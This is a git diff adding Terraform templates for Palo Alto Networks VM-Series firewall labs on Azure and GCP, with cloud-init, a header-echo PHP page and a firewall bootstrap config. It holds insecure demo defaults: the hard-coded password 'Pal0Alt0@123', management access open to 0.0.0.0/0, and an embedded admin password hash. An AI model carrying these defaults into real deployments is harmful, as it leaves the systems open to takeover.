+resource "azurerm_virtual_machine" "vmseries" {
+  count                        = var.vm_count
+  name                         = "${var.name}${count.index + 1}"
+  location                     = var.location
+  resource_group_name          = var.resource_group_name
+  vm_size                      = var.size
+  primary_network_interface_id = element(azurerm_network_interface.nic0.*.id, count.index)
+
+  network_interface_ids = [
+    element(azurerm_network_interface.nic0.*.id, count.index),
+    element(azurerm_network_interface.nic1.*.id, count.index),
+    element(azurerm_network_interface.nic2.*.id, count.index),
+  ]
+
+  availability_set_id = azurerm_availability_set.default.id
+
+  os_profile_linux_config {
+    disable_password_authentication = false
+  }
+
+  plan {
+    name      = var.license
+    publisher = "paloaltonetworks"
+    product   = "vmseries1"
+  }
+
+  storage_image_reference {
+    publisher = "paloaltonetworks"
+    offer     = "vmseries1"
+    sku       = var.license
+    version   = var.panos
+  }
+
+  storage_os_disk {
+    name              = "${var.name}${count.index + 1}-osdisk"
+    caching           = "ReadWrite"
+    create_option     = "FromImage"
+    managed_disk_type = "Standard_LRS"
+  }
+
+  os_profile {
+    computer_name  = "${var.name}${count.index + 1}"
+    admin_username = var.username
+    admin_password = var.password
+    custom_data = join(
+      ",",
+      [
+        "storage-account=${var.bootstrap_storage_account}",
+        "access-key=${var.bootstrap_access_key}",
+        "file-share=${var.bootstrap_file_share}",
+        "share-directory=${var.bootstrap_share_directory}",
+      ],
+    )
+  }
+  depends_on = [
+    null_resource.dependency_getter
+  ]
+}
+
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/vmseries/outputs.tf b/azure/transit_2fw_2spoke_common_appgw/modules/vmseries/outputs.tf
new file mode 100644
index 00000000..2dd03e08
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/vmseries/outputs.tf
@@ -0,0 +1,25 @@
+output nic0_id {
+  value = azurerm_network_interface.nic0.*.id
+}
+
+output nic1_id {
+  value = azurerm_network_interface.nic1.*.id
+}
+
+output nic2_id {
+  value = azurerm_network_interface.nic2.*.id
+}
+
+output nic1_public_ip {
+  value = azurerm_public_ip.nic1.*.ip_address
+}
+
+output nic1_private_ip {
+  value = azurerm_network_interface.nic1.*.private_ip_address
+}
+
+
+output nic0_public_ip {
+  value = azurerm_public_ip.nic0.*.ip_address
+}
+
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/vmseries/variables.tf b/azure/transit_2fw_2spoke_common_appgw/modules/vmseries/variables.tf
new file mode 100644
index 00000000..3c7b8cc2
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/vmseries/variables.tf
@@ -0,0 +1,98 @@
+variable location {
+}
+
+variable resource_group_name {
+}
+
+variable subnet_mgmt {
+}
+
+variable subnet_untrust {
+}
+
+variable subnet_trust {
+}
+
+variable avset_name {
+}
+
+variable panos {
+}
+
+variable license {
+}
+
+variable username {
+}
+
+variable password {
+}
+
+variable name {
+  default = "vmseries"
+}
+
+variable nsg_prefix {
+  description = "Enter a valid address prefix.  This address prefix will be able to access the firewalls mgmt interface over TCP/443 and TCP/22"
+  default     = "0.0.0.0/0"
+}
+
+variable vm_count {
+}
+
+variable size {
+  default = "Standard_DS3_v2"
+}
+
+variable sku {
+  default = "Standard"
+}
+
+variable public_ip_address_allocation {
+  default = "Static"
+}
+
+variable bootstrap_storage_account {
+  default = ""
+}
+
+variable bootstrap_access_key {
+  default = ""
+}
+
+variable bootstrap_file_share {
+  default = ""
+}
+
+variable bootstrap_share_directory {
+  default = "None"
+}
+
+variable nic0_public_ip {
+  type = bool
+  default = false
+}
+
+variable nic1_public_ip {
+  type = bool
+  default = false
+}
+
+variable nic2_public_ip {
+  default = null
+}
+
+variable nic1_backend_pool_ids {
+  type = list(string)
+  default = null
+}
+
+variable nic2_backend_pool_ids {
+  type = list(string)
+  default = null
+}
+
+variable dependencies {
+  type    = list(string)
+  default = []
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/vnet/main.tf b/azure/transit_2fw_2spoke_common_appgw/modules/vnet/main.tf
new file mode 100644
index 00000000..a11608f8
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/vnet/main.tf
@@ -0,0 +1,17 @@
+resource "azurerm_virtual_network" "vnet" {
+  name                = var.name
+  location            = var.location
+  address_space       = [var.address_space]
+  resource_group_name = var.resource_group_name
+  dns_servers         = var.dns_servers
+  tags                = var.tags
+}
+
+resource "azurerm_subnet" "subnet" {
+  name                      = element(var.subnet_names, count.index)
+  virtual_network_name      = azurerm_virtual_network.vnet.name
+  resource_group_name       = var.resource_group_name
+  address_prefix            = element(var.subnet_prefixes, count.index)
+ # network_security_group_id = lookup(var.nsg_ids, var.subnet_names[count.index], "")
+  count                     = length(var.subnet_names)
+}
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/vnet/outputs.tf b/azure/transit_2fw_2spoke_common_appgw/modules/vnet/outputs.tf
new file mode 100644
index 00000000..792f0082
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/vnet/outputs.tf
@@ -0,0 +1,25 @@
+output vnet_id {
+  description = "The id of the newly created vNet"
+  value       = azurerm_virtual_network.vnet.id
+}
+
+output vnet_name {
+  description = "The Name of the newly created vNet"
+  value       = azurerm_virtual_network.vnet.name
+}
+
+output vnet_location {
+  description = "The location of the newly created vNet"
+  value       = azurerm_virtual_network.vnet.location
+}
+
+output vnet_address_space {
+  description = "The address space of the newly created vNet"
+  value       = azurerm_virtual_network.vnet.address_space
+}
+
+output vnet_subnets {
+  description = "The ids of subnets created inside the new vNet"
+  value       = azurerm_subnet.subnet.*.id
+}
+
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/vnet/variables.tf b/azure/transit_2fw_2spoke_common_appgw/modules/vnet/variables.tf
new file mode 100644
index 00000000..348e3c13
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/vnet/variables.tf
@@ -0,0 +1,58 @@
+variable name {
+  description = "Name of the vnet to create"
+  default     = "vnet"
+}
+
+variable resource_group_name {
+  description = "Default resource group name that the network will be created in."
+  default     = "myapp-rg"
+}
+
+variable location {
+  description = "The location/region where the core network will be created. The full list of Azure regions can be found at https://azure.microsoft.com/regions"
+  default     = "westus"
+}
+
+variable address_space {
+  description = "The address space that is used by the virtual network."
+  default     = "10.0.0.0/16"
+}
+
+# If no values specified, this defaults to Azure DNS 
+variable dns_servers {
+  description = "The DNS servers to be used with vNet."
+  default     = []
+}
+
+variable subnet_prefixes {
+  description = "The address prefix to use for the subnet."
+  default     = ["10.0.1.0/24"]
+  type        = list(string)
+}
+
+variable subnet_names {
+  description = "A list of public subnets inside the vNet."
+  type        = list(string)
+  default     = ["subnet1", "subnet2", "subnet3"]
+}
+
+variable nsg_ids {
+  description = "A map of subnet name to Network Security Group IDs"
+  type        = map(string)
+
+  default = {
+    subnet1 = "nsgid1"
+    subnet3 = "nsgid3"
+  }
+}
+
+variable tags {
+  description = "The tags to associate with your network and subnets."
+  type        = map(string)
+
+  default = {
+    tag1 = ""
+    tag2 = ""
+  }
+}
+
diff --git a/azure/transit_2fw_2spoke_common_appgw/providers.tf b/azure/transit_2fw_2spoke_common_appgw/providers.tf
new file mode 100644
index 00000000..73e1aae5
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/providers.tf
@@ -0,0 +1,11 @@
+terraform {
+  required_version = ">= 0.12"
+}
+
+provider "azurerm" {
+  version         = "= 1.41"
+  #subscription_id = var.subscription_id
+  #client_id       = var.client_id
+  #client_secret   = var.client_secret
+  #tenant_id       = var.tenant_id
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/scripts/showheaders.php b/azure/transit_2fw_2spoke_common_appgw/scripts/showheaders.php
new file mode 100644
index 00000000..19c37318
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/scripts/showheaders.php
@@ -0,0 +1,62 @@
+<?php
+function microtime_float()
+{
+    list($usec, $sec) = explode(" ", microtime());
+    return ((float)$usec + (float)$sec);
+}
+
+$time_start = microtime_float();
+
+// Sleep for a while
+usleep(100);
+
+$time_end = microtime_float();
+$time = $time_end - $time_start;
+function getRealIpAddr()
+{
+    if (!empty($_SERVER['HTTP_CLIENT_IP']))   //check ip from share internet
+    {
+      $ip=$_SERVER['HTTP_CLIENT_IP'];
+    }
+    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   //to check ip is pass from proxy
+    {
+      $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
+    }
+    else
+    {
+      $ip=$_SERVER['REMOTE_ADDR'];
+    }
+    return $ip;
+}
+echo '<b style="color: red">
+      SOURCE & DESTINATION ADDRESSES
+      </b></br> ';
+echo '<strong>'. "INTERVAL" .'</strong>: '. $time .'<br />';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo '<strong>'. "SOURCE IP" .'</strong>: '. $sourceIPAddress .'<br />';
+echo '<strong>'. "LOCAL  IP" .'</strong>: '. $localIPAddress .'<br />';
+
+$vm_name = gethostname();
+echo '<strong>'. "VM NAME" .'</strong>: '. $vm_name .'<br />';
+echo ''. '<br />';
+echo '<b style="color: blue">
+      HEADER INFORMATION
+      </b></br> ';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+  if (substr($header, 0, 5) == 'HTTP_') {
+    /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+    $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+    /* Replace underscores by the dashes, as the browser sends them */
+    $clean_header = str_replace('_', '-', $clean_header);
+
+    /* Cleanup: standard headers are first-letter uppercase */
+    $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+    /* And show'm */
+    echo '<strong>'. $header .'</strong>: '. $value .'<br />';
+  }
+}
+?>
diff --git a/azure/transit_2fw_2spoke_common_appgw/scripts/web_startup.yml.tpl b/azure/transit_2fw_2spoke_common_appgw/scripts/web_startup.yml.tpl
new file mode 100644
index 00000000..1d02e945
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/scripts/web_startup.yml.tpl
@@ -0,0 +1,10 @@
+#cloud-config
+
+runcmd:
+  - sudo apt-get update -y
+  - sudo apt-get install -y php
+  - sudo apt-get install -y apache2
+  - sudo apt-get install -y libapache2-mod-php
+  - sudo rm -f /var/www/html/index.html
+  - sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/azure/transit_2fw_2spoke_common/scripts/showheaders.php
+  - sudo systemctl restart apache2
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/spokes.tf b/azure/transit_2fw_2spoke_common_appgw/spokes.tf
new file mode 100644
index 00000000..a4bf874b
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/spokes.tf
@@ -0,0 +1,97 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create spoke1 resource group, spoke1 VNET, spoke1 internal LB, (2) spoke1 VMs 
+
+resource "azurerm_resource_group" "spoke1_rg" {
+  name     = "${var.global_prefix}-${var.spoke1_prefix}-rg"
+  location = var.location
+}
+
+module "spoke1_vnet" {
+  source                      = "./modules/spoke_vnet/"
+  name                   = "${var.spoke1_prefix}-vnet"
+  address_space               = var.spoke1_vnet_cidr
+  subnet_prefixes             = var.spoke1_subnet_cidrs
+  remote_vnet_rg              = azurerm_resource_group.transit.name
+  remote_vnet_name            = module.vnet.vnet_name
+  remote_vnet_id              = module.vnet.vnet_id
+  route_table_destinations    = var.spoke_udrs
+  route_table_next_hop        = [var.fw_internal_lb_ip]
+  location                    = var.location
+  resource_group_name         = azurerm_resource_group.spoke1_rg.name
+}
+
+data "template_file" "web_startup" {
+  template = "${file("${path.module}/scripts/web_startup.yml.tpl")}"
+}
+
+module "spoke1_vm" { 
+  source              = "./modules/spoke_vm/"
+  name                = "${var.spoke1_prefix}-vm"
+  vm_count            = var.spoke1_vm_count
+  subnet_id           = module.spoke1_vnet.vnet_subnets[0]
+  availability_set_id = ""
+  backend_pool_ids    = [module.spoke1_lb.backend_pool_id]
+  custom_data         = base64encode(data.template_file.web_startup.rendered)
+  publisher           = "Canonical"
+  offer               = "UbuntuServer"
+  sku                 = "16.04-LTS"
+  username            = var.spoke_username
+  password            = var.spoke_password
+  tags                = var.tags
+  location            = var.location
+  resource_group_name = azurerm_resource_group.spoke1_rg.name
+}
+
+module "spoke1_lb" {
+  source                  = "./modules/lb/"
+  name                    = "${var.spoke1_prefix}-lb"
+  type                    = "private"
+  sku                     = "Standard"
+  probe_ports             = [80]
+  frontend_ports          = [80]
+  backend_ports           = [80]
+  protocol                = "Tcp"
+  enable_floating_ip      = false
+  subnet_id               = module.spoke1_vnet.vnet_subnets[0]
+  private_ip_address      = var.spoke1_internal_lb_ip
+  location                = var.location
+  resource_group_name     = azurerm_resource_group.spoke1_rg.name
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create spoke2 resource group, spoke2 VNET, spoke2 VM 
+
+resource "azurerm_resource_group" "spoke2_rg" {
+  name     = "${var.global_prefix}-${var.spoke2_prefix}-rg"
+  location = var.location
+}
+
+module "spoke2_vnet" {
+  source                      = "./modules/spoke_vnet/"
+  name                   = "${var.spoke2_prefix}-vnet"
+  address_space               = var.spoke2_vnet_cidr
+  subnet_prefixes             = var.spoke2_subnet_cidrs
+  remote_vnet_rg              = azurerm_resource_group.transit.name
+  remote_vnet_name            = module.vnet.vnet_name
+  remote_vnet_id              = module.vnet.vnet_id
+  route_table_destinations    = var.spoke_udrs
+  route_table_next_hop        = [var.fw_internal_lb_ip]
+  location                    = var.location
+  resource_group_name         = azurerm_resource_group.spoke2_rg.name
+}
+
+module "spoke2_vm" {
+  source              = "./modules/spoke_vm/"
+  name                = "${var.spoke2_prefix}-vm"
+  vm_count            = var.spoke2_vm_count
+  subnet_id           = module.spoke2_vnet.vnet_subnets[0]
+  availability_set_id = ""
+  publisher           = "Canonical"
+  offer               = "UbuntuServer"
+  sku                 = "16.04-LTS"
+  username            = var.spoke_username
+  password            = var.spoke_password
+  tags                = var.tags
+  location            = var.location
+  resource_group_name = azurerm_resource_group.spoke2_rg.name
+}
diff --git a/azure/transit_2fw_2spoke_common_appgw/terraform.tfvars b/azure/transit_2fw_2spoke_common_appgw/terraform.tfvars
new file mode 100644
index 00000000..3304b1e6
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/terraform.tfvars
@@ -0,0 +1,43 @@
+#fw_license   = "byol"                                                       # Uncomment 1 fw_license to select VM-Series licensing mode
+#fw_license   = "bundle1"
+#fw_license   = "bundle2"
+
+global_prefix = ""                                                           # Prefix to add to all resource groups created.  This is useful to create unique resource groups within a shared Azure subscription
+location      = "centralus"
+
+# -----------------------------------------------------------------------
+# VM-Series resource group variables
+
+fw_prefix               = "vmseries"                                         # Adds prefix name to all resources created in the firewall resource group
+fw_count                = 2
+fw_panos                = "9.0.1"
+fw_nsg_prefix           = "0.0.0.0/0"
+fw_username             = "paloalto"
+fw_password             = "Pal0Alt0@123"
+fw_internal_lb_ip       = "10.0.2.100"
+
+# -----------------------------------------------------------------------
+# Transit resource group variables
+
+transit_prefix          = "transit"                                         # Adds prefix name to all resources created in the transit vnet's resource group
+transit_vnet_cidr       = "10.0.0.0/16"
+transit_subnet_names    = ["mgmt", "untrust", "trust","gateway"]
+transit_subnet_cidrs    = ["10.0.0.0/24", "10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"]
+
+# -----------------------------------------------------------------------
+# Spoke resource group variables
+
+spoke1_prefix           = "spoke1"                                          # Adds prefix name to all resources created in spoke1's resource group
+spoke1_vm_count         = 2
+spoke1_vnet_cidr        = "10.1.0.0/16"
+spoke1_subnet_cidrs     = ["10.1.0.0/24"]
+spoke1_internal_lb_ip   = "10.1.0.100"
+
+spoke2_prefix           = "spoke2"                                          # Adds prefix name to all resources created in spoke2's resource group
+spoke2_vm_count         = 1
+spoke2_vnet_cidr        = "10.2.0.0/16"
+spoke2_subnet_cidrs     = ["10.2.0.0/24"]
+
+spoke_username          = "paloalto"
+spoke_password          = "Pal0Alt0@123"
+spoke_udrs              = ["0.0.0.0/0", "10.1.0.0/16", "10.2.0.0/16"]
diff --git a/azure/transit_2fw_2spoke_common_appgw/variables.tf b/azure/transit_2fw_2spoke_common_appgw/variables.tf
new file mode 100644
index 00000000..4899c169
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/variables.tf
@@ -0,0 +1,129 @@
+variable location {
+  description = "Enter a location"
+}
+
+variable fw_prefix {
+  description = "Prefix to add to all resources added in the firewall resource group"
+  default     = ""
+}
+
+variable fw_license {
+  description = "VM-Series license: byol, bundle1, or bundle2"
+  # default = "byol"   
+  # default = "bundle1"  
+  # default = "bundle2"
+}
+
+variable global_prefix {
+  description = "Prefix to add to all resource groups created.  This is useful to create unique resource groups within a shared Azure subscription"
+}
+#-----------------------------------------------------------------------------------------------------------------
+# Transit VNET variables
+
+variable transit_prefix {
+}
+
+variable transit_vnet_cidr {
+}
+
+variable transit_subnet_names {
+  type = list(string)
+}
+
+variable transit_subnet_cidrs {
+  type = list(string)
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# VM-Series variables
+
+variable fw_count {
+}
+
+variable fw_nsg_prefix {
+}
+
+variable fw_panos {
+}
+
+variable fw_username {
+}
+
+variable fw_password {
+}
+
+variable fw_internal_lb_ip {
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Spoke variables
+
+variable spoke_username {
+}
+
+variable spoke_password {
+}
+
+variable spoke_udrs {
+}
+
+variable spoke1_prefix {
+  description = "Prefix to add to all resources added in spoke1's resource group"
+}
+
+variable spoke1_vm_count {
+}
+
+variable spoke1_vnet_cidr {
+}
+
+variable spoke1_subnet_cidrs {
+  type = list(string)
+}
+
+variable spoke1_internal_lb_ip {
+}
+
+variable spoke2_prefix {
+  description = "Prefix to add to all resources added in spoke2's resource group"
+}
+
+variable spoke2_vm_count {
+}
+
+variable spoke2_vnet_cidr {
+}
+
+variable spoke2_subnet_cidrs {
+  type = list(string)
+}
+
+variable tags {
+  description = "The tags to associate with newly created resources"
+  type        = map(string)
+
+  default = {}
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Azure environment variables
+
+variable client_id {
+  description = "Azure client ID"
+  default = ""
+}
+
+variable client_secret {
+  description = "Azure client secret"
+  default = ""
+}
+
+variable subscription_id {
+  description = "Azure subscription ID"
+  default = ""
+}
+
+variable tenant_id {
+  description = "Azure tenant ID"
+  default = ""
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/Guide.pdf b/gcp/GP-NoAutoScaling/Guide.pdf
new file mode 100644
index 00000000..8b294c36
Binary files /dev/null and b/gcp/GP-NoAutoScaling/Guide.pdf differ
diff --git a/gcp/GP-NoAutoScaling/README.md b/gcp/GP-NoAutoScaling/README.md
new file mode 100644
index 00000000..e140aa27
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/README.md
@@ -0,0 +1,51 @@
+# GlobalProtect in GCP
+
+Terraform creates a basic GlobalProtect infrastructure consisting of 1 Portal and 2 Gateways (in separate Zones) along with two test Ubuntu servers. 
+
+Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/gcp/GP-NoAutoScaling/GUIDE.pdf) for more information.
+
+</br>
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/GP-NoAutoScaling/images/GP_in_GCP.png">
+</p>
+
+
+## Prerequistes 
+* Valid GCP Account with existing project
+* Access to GCP Cloud Terminal or to a machine with a Terraform 12 installation
+
+</br>
+
+## How to Deploy
+### 1. Setup & Download Build
+In your project, open GCP Cloud Terminal and run the following.
+```
+$ gcloud services enable compute.googleapis.com
+$ ssh-keygen -f ~/.ssh/gcp-demo -t rsa -C gcp-demo
+$ git clone https://github.com/wwce/terraform; cd terraform/gcp/GP-NoAutoScaling
+```
+
+### 2. Edit terraform.tfvars
+Open terraform.tfvars and edit variables (lines 1-4) to match your Billing ID, Project Base Name, SSH Key (from step 1), and Region.
+
+
+### 3. Deploy Build
+```
+$ terraform init
+$ terraform apply
+```
+
+</br>
+
+## How to Destroy
+Run the following to destroy the build and remove the SSH key created in step 1.
+```
+$ terraform destroy
+$ rm ~/.ssh/gcp-demo*
+```
+
+</br>
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway.tf b/gcp/GP-NoAutoScaling/bootstrap-gateway.tf
new file mode 100644
index 00000000..d5249b81
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-gateway.tf
@@ -0,0 +1,31 @@
+resource "google_storage_bucket" "gateway_bucket" {
+  name            = "gateway-${random_id.random_number.hex}"
+  storage_class   = "REGIONAL"
+  location        = var.GCP_Region
+  project         = google_project.globalprotect.number
+} 
+resource "google_storage_bucket_object" "gateway_bootstrap" {
+  name   = "config/bootstrap.xml"
+  source = "bootstrap-gateway/bootstrap.xml"
+  bucket = google_storage_bucket.gateway_bucket.name
+}
+resource "google_storage_bucket_object" "gateway_init_cfg" {
+  name   = "config/init-cfg.txt"
+  source = "bootstrap-gateway/init-cfg.txt"
+  bucket = google_storage_bucket.gateway_bucket.name
+}
+resource "google_storage_bucket_object" "gateway_content" {
+  name   = "content/null.txt"
+  source = "bootstrap-gateway/null.txt"
+  bucket = google_storage_bucket.gateway_bucket.name
+}
+resource "google_storage_bucket_object" "gateway_software" {
+  name   = "software/null.txt"
+  source = "bootstrap-gateway/null.txt"
+  bucket = google_storage_bucket.gateway_bucket.name
+}
+resource "google_storage_bucket_object" "gateway_license" {
+  name   = "license/null.txt"
+  source = "bootstrap-gateway/null.txt"
+  bucket = google_storage_bucket.gateway_bucket.name
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway/bootstrap.xml b/gcp/GP-NoAutoScaling/bootstrap-gateway/bootstrap.xml
new file mode 100644
index 00000000..6da28cec
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-gateway/bootstrap.xml
@@ -0,0 +1,647 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="9.0.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$afhulhyx$P9pkv4/MiYY070qlWmN.v0</phash>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo=</public-key>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <certificate>
+      <entry name="dummy-gw-cert">
+        <subject-hash>a0cb01b7</subject-hash>
+        <issuer-hash>e8d8421e</issuer-hash>
+        <not-valid-before>Mar 24 17:02:26 2020 GMT</not-valid-before>
+        <issuer>/CN=GP-CA</issuer>
+        <not-valid-after>Mar 24 17:02:26 2021 GMT</not-valid-after>
+        <common-name>dummy-gw-cert</common-name>
+        <expiry-epoch>1616605346</expiry-epoch>
+        <ca>no</ca>
+        <subject>/CN=dummy-gw-cert</subject>
+        <public-key>-----BEGIN CERTIFICATE-----
+MIIDFDCCAfygAwIBAgIFAIsWwrMwDQYJKoZIhvcNAQELBQAwEDEOMAwGA1UEAxMF
+R1AtQ0EwHhcNMjAwMzI0MTcwMjI2WhcNMjEwMzI0MTcwMjI2WjAYMRYwFAYDVQQD
+Ew1kdW1teS1ndy1jZXJ0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
+stP0zbfGt7hagWFqN1AD8HsQC1MtPNJRif9TCdskkm15k4nNQmk17ynuXKQNolBB
+hoT+HyUN3AISxJ59QiEuwM0ZSta8PeYrgRSs1fFBWYx1o8Iel9uIGVt+wA81bgau
+fNa1xkKjEDf/9gUoIS/pshitwxzmdp9b5EAgP6AnMfvHQynITzE1hxB9vTh0V8kW
+glQ8H6s0PkxUaLoHmNhjj3Zwcg7FdiIgzJGOKK6fo/89Mc4BnqNLNqlvqzJC5meT
+hdiZFwn/8O9urfKFRp36ZUp+FDHSYIhATiW1MhyiAEfxvjtTeNT9nffhDTC+obJO
+lUSkc3fkuqnQ4pJH/29/LQIDAQABo20wazAJBgNVHRMEAjAAMAsGA1UdDwQEAwID
+uDAnBgNVHSUEIDAeBggrBgEFBQcDAQYIKwYBBQUHAwIGCCsGAQUFBwMFMAkGA1Ud
+IwQCMAAwHQYDVR0OBBYEFD+qH0n0MvDc7amKUccXYBTXYMfMMA0GCSqGSIb3DQEB
+CwUAA4IBAQB3R44cMm/JqxiXoId8/7oFb9WfBrkBV77QXg9aDec34x4PjEYbRpDb
+9S+WFhWAG344MHluqsZuJF8PLtLSruNSfw4wxymMnHTKvn6yUT9o1Kseh/iRtFW4
+Oyog93g29rnqfVnJ1IslkgIdSB+LeW1wjOvIYcAfRQj0qFp4RK9esoJG4vvDTDI5
+BsmRqxR3aa9BY74wZMrnG5xby+Eyfo6RXzmjuR765yRO5HQSGQQhkKa+OhjkXrKA
+KlciqAIoD2NIusdlPUJtlyG0TKgq859+dICv2QTGxvT6YYt0eMR/85q/M1ydEiPd
+G4K6WWOKEwaJ5f9vyjCOTi42OJFzSOZq
+-----END CERTIFICATE-----
+</public-key>
+        <algorithm>RSA</algorithm>
